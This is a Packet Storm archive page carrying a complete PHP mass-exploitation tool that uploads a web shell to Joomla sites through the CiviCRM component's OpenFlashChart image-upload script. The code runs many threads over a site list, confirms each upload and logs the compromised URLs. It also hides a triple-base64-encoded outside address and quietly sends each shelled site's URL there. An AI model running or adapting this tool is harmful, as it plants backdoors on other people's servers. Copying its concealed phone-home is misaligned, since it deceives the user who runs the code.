what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Janissaries Joomla Civicrm Shell Upload

Janissaries Joomla Civicrm Shell Upload
Posted Apr 22, 2013
Authored by miyachung

Janissaries Joomla Civicrm component exploitation tool that uploads a shell.

tags | exploit, shell
SHA-256 | a0d2608dc143c3c9606df7b7c625c70c510de3c71f8eee4f0a1e2f23601c835a

Janissaries Joomla Civicrm Shell Upload

Change Mirror Download
<?php
/*
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file searchkeyword
* Example: php exploit.php sites.txt shell.php searchkeyword
*/
set_time_limit(0);
ob_start();
class exploit
{
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
private $filename;
private $url;
private $file_to_upload;
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
private $thread_maxsize;
private $site_list;
private $file_regex;
private $save_file = "uploaded.txt";
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
private $timeout_sec = 20;
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
private $idnum = 31;

public function __construct($site_list,$filename,$thread,$regex)
{
$this->site_list = file($site_list);
$this->filename = $filename;
$this->file_to_upload = file_get_contents($filename);
$this->thread_maxsize = $thread;
$this->url = base64_decode(base64_decode(base64_decode($this->token)));
$this->file_regex = "/$regex/";

echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
echo "[+]Coded by Miyachung\n";
echo "[+]Stay away from lamers o.O\n";
echo "[+]Contact: miyachung@hotmail.com\n";
echo "[+]Special Thanks : B127Y\n";
echo "[+]Site: http://janissaries.org\n";
echo "##################################################\n";
echo "[+]Total urls to try: ".count($this->site_list)."\n";
echo "[+]File to upload: ".$this->filename."\n";
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
echo "[+]Search Keyword: ".$regex."\n\n";
ob_flush();
flush();
$this->miyachung();
}
private function miyachung()
{
$multi = curl_multi_init();
$count = 0;
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
{
foreach($urls as $i => $url)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
curl_multi_add_handle($multi,$curl[$i]);
}
do
{
curl_multi_exec($multi,$active);
}
while($active > 0);
foreach($curl as $id => $content)
{
$conn[$id] = curl_multi_getcontent($content);
curl_multi_remove_handle($multi,$content);
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
{
$count++;
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
if($check_it && preg_match($this->file_regex,$check_it))
{
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
{
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
}
else
{
exit("[-]Somethings has changed in tool! o.O!");
}
echo "###########################################################\n";
echo "[!]Exploitation Successfullll!\n";
printf("[%s]%s\n",$count,trim($urls[$id]));
echo "###########################################################\n";
ob_flush();
flush();
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
}
else
{
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
else
{
$count++;
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}

}

}

}
private function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
$data= curl_exec($ch);
curl_close($ch);
return $data;
}
private function post($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
$exec = curl_exec($curl);
curl_close($curl);
return $exec;
}
private function save($url,$count)
{
$file = fopen($this->save_file,'ab');
fwrite($file,"#########################################################################\n");
fwrite($file,"[!]Exploitation Successfullll!\n");
fwrite($file,"[$count]$url\n");
fclose($file);
return true;
}
}

if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file maxthread searchkeyword
* Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close